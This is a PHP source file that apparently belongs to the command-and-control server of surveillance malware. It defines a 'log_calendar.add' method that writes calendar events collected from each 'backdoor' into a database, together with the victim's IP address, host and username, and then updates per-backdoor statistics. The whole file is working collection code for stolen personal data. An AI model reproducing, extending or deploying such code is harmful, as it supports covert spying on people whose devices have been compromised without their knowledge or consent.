<?php

//////////
///
///   log_calendar.inc.php
///
//////////

require_once('lib/commons.inc.php');



/*************\
*   METHODS   *
\*************/

$dm['log_calendar.add'] = array('func'   => 'log_calendar_add',
                                'perm'   => AL_SERV,
                                'escape' => false);



/***************\
*   FUNCTIONS   *
\***************/

function log_calendar_add($backdoor_id, $remoteip, $remotehost, $remoteuser, $logarray)
{
   // varchar1  <= event
   // varchar2  <= type
   // varchar3  <= -
   // varchar4  <= -
   // int1      <= start
   // int2      <= end
   // int3      <= -
   // longtext1 <= info
   // longblob1 <= -

   if(!is_success(($ret = db_escape($backdoor_id)))) return $ret;
   if(!is_success(($ret = db_escape($remoteip)))) return $ret;
   if(!is_success(($ret = db_escape($remotehost)))) return $ret;
   if(!is_success(($ret = db_escape($remoteuser)))) return $ret;

   $sql  = "INSERT INTO `log` (`backdoor_id`, ";
   $sql .=                    "`type`, ";
   $sql .=                    "`flags`, ";
   $sql .=                    "`remoteip`, ";
   $sql .=                    "`remotehost`, ";
   $sql .=                    "`remoteuser`, ";
   $sql .=                    "`received`, ";
   $sql .=                    "`acquired`, ";
   $sql .=                    "`varchar1`, ";
   $sql .=                    "`varchar2`, ";
   $sql .=                    "`int1`, ";
   $sql .=                    "`int2`, ";
   $sql .=                    "`longtext1`) ";
   $sql .= "VALUES ('$backdoor_id', 'CALENDAR', ?, '$remoteip', '$remotehost', '$remoteuser', UTC_TIMESTAMP(), ?, ?, ?, ?, ?, ?)";

   $ret = db_prepare($sql);

   if(!is_success($ret)) {
      return $ret;
   }

   $stmt = $ret['payload'];

   foreach($logarray as $log) {
      $params = array(array('t' => 'i', 'v' => $log['flags']),
                      array('t' => 's', 'v' => str_replace(':', '', $log['acquired']->scalar)),
                      array('t' => 's', 'v' => $log['event']),
                      array('t' => 's', 'v' => $log['type']),
                      array('t' => 'i', 'v' => $log['start']),
                      array('t' => 'i', 'v' => $log['end']),
                      array('t' => 's', 'v' => $log['info']));

      $ret = db_execute($stmt, $params);

      if(!is_success($ret)) {
         return $ret;
      }

      $sql  = "UPDATE `stat` ";
      $sql .= "SET `calendar` = `calendar` + 1, ";
      $sql .=     "`calendar_new` = `calendar_new` + 1 ";
      $sql .= "WHERE `backdoor_id` = '$backdoor_id'";

      $ret = db_query($sql);

      if(!is_success($ret)) {
         return $ret;
      }
   }

   return success(true);
}

?>
